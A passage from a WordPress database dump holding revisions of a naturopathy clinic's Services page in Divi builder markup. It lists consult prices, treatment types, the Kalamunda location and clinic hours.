module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2026-01-03 15:41:59','2026-01-03 07:41:59','',424,'https://verdenaturopathy.com.au/?p=509',0,'revision','',0),(511,1,'2026-02-19 13:15:13','2026-02-19 05:15:13','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $215\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $70\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2026-02-19 13:15:13','2026-02-19 05:15:13','',424,'https://verdenaturopathy.com.au/?p=511',0,'revision','',0),(514,1,'2026-02-19 13:18:41','2026-02-19 05:18:41','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $215\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as 